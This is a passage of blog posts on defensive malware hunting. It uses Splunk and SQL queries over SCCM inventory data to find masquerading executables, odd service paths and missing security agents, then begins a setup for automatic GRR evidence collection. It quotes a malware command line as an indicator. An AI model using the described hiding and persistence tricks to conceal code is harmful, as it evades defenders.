<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you see a filename like ‘Update.exe’ which only exists on one system, probably going to want to investigate it. Get creative, search by product name, description or a combination of both. Since everything is timestamped you might consider adding a report on servers or high-valued targets like executives and their administrative staff. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Find malware that attempts to hide by using common Windows system filenames like ‘svchost.exe’ that are in the wrong directory: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="121px;" src="https://lh6.googleusercontent.com/w7foS0_Q4i8Tr4-dzRZF4v0K5i4zEc0YGOKdxlBwdn_kjgH-Fvz-W1SE0jQQ01e6KQbN3ZXnF_Am5DgWbZvOacIwzsBGY6HIesNv0hGMS2p7AJ4_lZBWRnZUz_r4Aeqthm7BYFUJ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="452px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you see ‘svchost.exe’ in an appdata or temp folder, that would be red flag to investigate further. To take this example further you could include other common windows filenames with: </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">WHERE FileName IN ('wininit.exe', 'svchost.exe', ‘services.exe’) group by [FilePath]</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;"><br /></span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It will be obvious where to investigate further by looking at the outliers. If you investigated enough malware infections you will no doubt have a list of clever names used my malware authors such as 'system.exe', 'lsass.exe', 'services.exe'. Also keep in mind the data collected by SCCM the next time you read about a new threat and how it can be used to quickly search for indictors of compromise.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Executables in $Recycle.Bin</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="123px;" src="https://lh5.googleusercontent.com/VM8Z33dJqsWlC-IJVDgvG-tCB8NWKDfIrONiaMmFDXsZfMmZLu3B6l3_66ay-xSaM1kwU5DxrDmyW1CUHM0JsTYhrqkpvut_wsf5_t_TobaKllN9STzE0J8n6h0r9LPs97eehzKe" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="456px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Service outliers, least frequency of occurrence by path on disk:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="43px;" src="https://lh5.googleusercontent.com/Y88mUffQsbMCbJM1L04HpnpyO0p7UrJRBYfG3yQqI6XoSVKLGypCwqr34UY_-_M0rJ-M7oylEOHskyvGe86kBV2N33Gb--oGITKOAtnXyqIz0QV0SA2_YgRs1WTiGIu62sd4JEhr" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="399px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Search for a service where the executable is located in an odd place like %temp% or %appdata% by appending: </span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-style: italic; line-height: 1.38; text-align: center; white-space: pre-wrap;"><span style="font-size: xx-small;"> WHERE [Name0] LIKE ‘%temp%</span></span></blockquote>
<br />
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; line-height: 20.24px; white-space: pre-wrap;">Using the same methodology, search for least frequency of occurrence based on filename. Since you have the data in Splunk you might even add an alert based upon new service running on a domain controller or publicly accessible server. </span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you’re feeling really adventurous, try checking out any executables hanging out in temp folder. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="119px;" src="https://lh3.googleusercontent.com/wJUPEOPGJ0RwxfC_zF3x6n14XZY46B2T2_F3TwdWcnPO7S9UhWwAymVoMZ5JspJxor9VrSo_1Tgm0tfdGRSHWiQW0f06c7PxMWews5ZYF__0SFUY2pu4xTSA-P44PbE6XvhVI28B" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="461px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Fast Triage All the Files in < 1 Minute.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If you have an incident occur or just want to triage some intelligence across the enterprise using static indicators like:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filename</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Filepath</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Internal File Description</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span class="Apple-tab-span" style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; white-space: pre;"> </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Internal File Version</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span class="Apple-tab-span" style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; white-space: pre;"> </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Files Modified Timestamp</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span class="Apple-tab-span" style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; white-space: pre;"> </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">Autorun </span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 20.24px; text-indent: 36pt; white-space: pre-wrap;">persistence</span><span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;">: Registry key/value or file/lnk in startup folders.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 14.6667px; line-height: 1.38; text-indent: 36pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You can use those indicators to quickly triage every binary file (or any file metadata you’re collecting) in your enterprise that was available at the time the client inventory process was ran. If you don't have the files internal file description in the provided intelligence, consider looking up the MD5 on <a href="https://www.virustotal.com/" target="_blank">Virustotal</a> to get it.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In previous investigations I came across malware with the internal metadata company name of “Microsoft Corp.” which is unique since Microsoft doesn’t abbreviate Corporation. Using this we could triage every executable in the enterprise to see any others executables have this company name:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="98px;" src="https://lh4.googleusercontent.com/7zmwwOKAoMhICW0ZxDRsJgwkQJ07K2jYxfxffi3YR3XgbKf_BkLr_QneUViRkiCPvy_a1Hna542BTBQihLx4dLKapaBAn2bP6ZWZy0ycKS7w8HU0eRT9qB2WbEV2oaxlkNPystRZ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="557px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The same could be done with filename, path or using a combination of the collected metadata e.g. any executable between 55K and 57K modified in the last week. This is a good way to quickly search the enterprise while your other hunting tools are still running, but keep in mind this is searching a snapshot of time, you should know at what frequency your SCCM server collects this information.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Security Agent Health Monitoring & Coverage</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As a bonus, throw in some queries to check if your security agents are installed and if their service is started. As an example, here is query to check for hosts that do not have <a href="https://github.com/google/grr" target="_blank">GRR</a> installed. In this example you can replace GRR with any application, keep in mind this query checks if the service is </span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.6667px; font-style: normal; font-variant: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;"><u>not</u></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> present. Its also possible to query add/remove programs but you get more bang for the buck by querying services. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Add the following DB input query:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SELECT DISTINCT [ResourceID], </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[Name] AS Missing_GRR </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">FROM [SCCM].[dbo].[v_GS_SERVICE] </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">LEFT JOIN [SCCM].[dbo].[v_ActiveClients] [Name] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">ON [ResourceID] = [MachineResourceID] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WHERE [ResourceID] NOT IN </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(select [ResourceID] FROM [SCCM].[dbo].[v_GS_SERVICE] </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">WHERE [DisplayName0] = 'GRR Service') AND [Name] IS NOT NULL</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Set the input to run every 24-hours and now you can use a simple query in Splunk to see what hosts don’t have your security agents installed:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="172px;" src="https://lh5.googleusercontent.com/ilEPGyL0sZL8XqYRBv1Lc4o3bxc2KNNE5O4ANBQDI-TQlQs4ujFPB0N_jFbOjRadmAVOCCkT9gD-Wm9iZUd90CdWD3MKwVZZ0CxFa8mRm4raFxZHouPT7yvkwWkt7GbqlBMltzgL" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="556px;" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Add in another DB input to query the status of services for your security agents that are installed:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="147px;" src="https://lh3.googleusercontent.com/bt47EOmXiOoLQphpV0GdALFhpb9qRLpfAL8q7UGoatmcfsebEValNS70DzYKvABpp7gt9-49TPdGe-OoPJ1f9gDUx1iUsBd6pWpAHfd_YA-w704PYHbnVCVOXAPb21ug0lFXqW02" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="623px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In Splunk you can search for disabled agents with:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">index=sccm StartMode=Disabled |stats count by Service</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="278px;" src="https://lh6.googleusercontent.com/0KEY77beOii37g6i7oBbRVShTQXzivY2vq4N2XIsLC0i5r-UfydZj2KiKnGJuTjqj0k9y5SxW_GT1TfaOtDwXeVlKOOprifNFzf0mi1pOrJ7gqTwbopZXT3CiKlYJJXL9kd7yk4P" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="474px;" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Now you have pretty picture to show you how many of your security agents are missing from endpoints. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">As you can see there is a lot of good data to find evil and also to search for indicators of compromise from known threats or when you receive new intelligence. This is only scratching the surface but hopefully will give you some ideas that are useful in your enterprise. While SCCM doesn’t collect everything, sometime it collects enough to get you what you need for hunting or during an incident. If you found anything useful for malware hunting or DFIR in SCCM database, please share it with me <a class="g-profile" href="https://plus.google.com/107420357665242655156" target="_blank">+Keith Tyler</a> </span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Cheers and happy hunting!</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-2139855789243746740.post-15197144007562842112015-10-21T14:00:00.002-07:002015-10-21T14:00:58.883-07:00Automating Forensic Artifact Collection with Splunk and GRR<div class="tr_bq">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Recently I had the need for <a href="https://github.com/google/grr" target="_blank">GRR</a> to collect forensic artifacts when a Splunk alert was triggered. The point of this is to collect the forensics data when a incident ticket is generated to save IR staff time and eliminate redundant </span><span style="font-family: Arial, Helvetica, sans-serif;">redundant</span><span style="font-family: Arial, Helvetica, sans-serif;"> tasks.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Example Scenario</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">When a pre-defined malicious event is seen, Splunk will send an email with event details to the ticketing system and IR folks will investigate. One of the first step in the example below is to acquire the files in question with GRR. To save time we will want to automate the collection of evidence.</span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">AV does a horrible job of detecting malicious scripts like <a href="https://www.symantec.com/security_response/writeup.jsp?docid=2014-110322-0143-99" target="_blank">JS.Proslikefan.B</a> <span style="font-size: xx-small;">(and anything malicious in general)</span>. However, with the help of <a href="http://digirati82.com/wls-information/" target="_blank">WLS</a> this is simple to detect and alert on. Splunk search:</span><br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">`wlslogs` (EventID=4688 OR EventID=592) InternalName=wscript.exe BaseFileName!=wscript.exe</span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;">To briefly explain this alert, JS.Proslikefan maintains persistent by executing a 'random filename.lnk' file in the startup folder. The LNK file executes a randomly named copy of 'wscript.exe' in the appdata folder along with the malicious script. When a person logs on to an infected machine it would generate a WLS event like this (snippet):</span><br />
<br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">BaseFileName="udpbat.exe" </span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-small;">InternalName="wscript.exe" </span></span><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: x-small;">CommandLine="C:\Users\tupac\AppData\Roaming\avseda\udpbat.exe C:\Users\tupac\AppData\Roaming\avseda\vnyqxluw.js"</span></span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>Process Overview </b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">1. Splunk alert finds execution of 'wscript.exe' when BaseFileName is not 'wscript.exe'.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">2. Splunk alert launches 'wrapper.py' which then launches 'grrRemoteGetFile.py'. </span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">3. 'grrRemoteGetFile.py' sends </span><span style="font-family: Arial, Helvetica, sans-serif;">GRR </span><span style="font-family: Arial, Helvetica, sans-serif;">an API request to acquire files in question.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">4. Profit.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Splunk uses its own python version which doesn't have modules like 'requests'. Rather than installing modules into Splunk's python, we can just use a wrapper which will use the system default version of python. </span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Creating the Splunk Alert</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Run the search and when you're satisfied your search has minimal false positives, save it as an Alert.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-5om5NSZ_cyI/ViHC-iVoADI/AAAAAAAAsr8/BeMFT1g9SUg/s1600/savasAlert.tiff" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="http://4.bp.blogspot.com/-5om5NSZ_cyI/ViHC-iVoADI/AAAAAAAAsr8/BeMFT1g9SUg/s200/savasAlert.tiff" width="200" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;">When going through the alert wizard check the 'enable' box under Run a script and enter wrapper.py</span><br />
<div class="separator" style="clear: both; text-align: center;">
